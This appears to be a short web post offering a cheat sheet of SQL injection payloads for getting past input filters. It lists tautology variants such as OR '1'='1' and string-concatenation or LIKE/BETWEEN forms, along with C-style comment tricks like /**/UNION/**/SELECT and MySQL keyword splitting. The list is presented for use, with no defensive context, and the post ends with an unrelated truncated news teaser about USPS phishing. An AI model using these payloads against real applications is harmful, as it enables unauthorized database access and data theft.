here or some Simple replacments to Evoid SQL Injection filters
OR '1' = '1'
OR 1 = 1
OR 'unusual' = 'unusual'
OR 'Simple' = 'Sim' + 'ple'
OR 'Simple'= N'simple' # the N dosent make any diffrence
OR 'Simple' > 'S'
OR 'Simple' < 'X' OR 'Simple' LIKE 'Sim%' OR 2 > 1
OR 'Simple' IN ('Simple')
OR 'Simple' BETWEEN 'R' and 'T'
/**/OR/**/'Simple'='Simple'
play with spaces or drop them completely
UNION SELECT
To escape any filter that checks a UNION followed by spaces and then the work SELECT –we can use a C like comment syntax available for most of DB's
UNION /**/ SELECT name…
/**/UNION/**/SELECT/**/name…
For ORACLE use:
'/**/OR/**/'Simple'='Simple'
For MySql use:
UN/**/ION/**/ SE/**/LECT/**
US Post Office phishing sites get as much traffic as the real one
-
Security researchers analyzing phishing campaigns that target United States
Postal Service (USPS) saw that the traffic to the fake domains is typically
sim...
5 hours ago
